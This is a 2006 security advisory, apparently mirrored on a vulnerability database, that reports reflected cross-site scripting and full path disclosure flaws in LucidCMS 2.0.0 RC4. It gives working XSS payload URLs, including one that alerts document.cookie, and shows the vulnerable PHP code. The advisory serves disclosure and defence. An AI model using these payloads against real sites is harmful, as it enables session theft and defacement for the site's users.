Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12070
HistoryApr 04, 2006 - 12:00 a.m.

Multiple Vulnerabilities in LucidCMS

2006-04-0400:00:00
vulners.com
7
JSON

Multiple Vulnerabilities in LucidCMS

Author : Rusydi Hasan M
a.k.a : cR45H3R
Date : April,1st 2006
Location : Indonesia, Cilacap

— Software description

lucidCMS is a simple and flexible content management system for
the individual or organization that wishes to manage a collection
of web pages without the overhead and complexity of other available
open source "community" CMS options.

HOME : http://lucidCMS.net
Version : 2.0.0 RC4

— The bugs

There's 2 bugs.XSS and full path disclosures

— PoC

  1. XSS a.k.a Cross site scripting

    How the Proof of concepts ?

    http://[victim]/[lucidcms_dir]/index.php?command=login'>[XSS_here]
    http://[victim]/[lucidcms_dir]/index.php?i18n=cs_CZ&command=panel'>[XSS_here]
    http://[victim]/[lucidcms_dir]/index.php?i18n=en_US&command=panel'>[XSS_here]

    example :

http://127.0.0.1/lucidcms/index.php?i18n=en_US&command=panel'><script>alert(document.cookie)</script>

http://127.0.0.1/lucidcms/index.php?i18n=en_US&command=panel'><h1>Bla bla
bla</h1>

http://127.0.0.1/lucidcms/index.php?command=login&#39;&gt;&lt;script&gt;alert&#40;&#39;patch your
lucidCMS')</script>

http://127.0.0.1/lucidcms/index.php?i18n=cs_CZ&amp;command=panel&#39;&gt;&lt;h1&gt;stooopidz&lt;/h1&gt;

  1. Full path disclosures

    in /lucid_phplib/translator.php

    http://[victim]/[lucidcms_dir]/lucid_phplib/translator.php

    Warning: opendir(DIR_LANG): failed to open dir: No such file or directory in
    /var/www/html/lucidcms/lucid_phplib/translator.php on line 45

    Warning: readdir(): supplied argument is not a valid Directory resource in
    /var/www/html/lucidcms/lucid_phplib/translator.php on line 46

    Where's the problem ???

    function get_languages(){
    $langs = array();
    $dir = opendir(DIR_LANG); <– This is the trouble
    while($name = readdir($dir)) { <– and this too
    if ($name == '.' || $name== '…') continue;
    $langFile = DIR_LANG.$name.'/LC_MESSAGES/'.CONFIG_DOMAIN.'.mo';
    if (file_exists($langFile)) {
    // $GLOBALS['echoLater'][] = $langFile; //troublshooting…
    $langs[] = $name;
    }
    }
    return $langs;
    }//get_languages

— vendor

I'm too lazy :D .

— shoutz

  1. kecoak
    (fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,etc)
  2. echo staff (y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32,
    anonymous, the day)
  3. ph03n1x,ghoz,spyoff,slackX,r34d3r,xnuxer,negative,sakitjiwa

— contact

[email protected]

JSON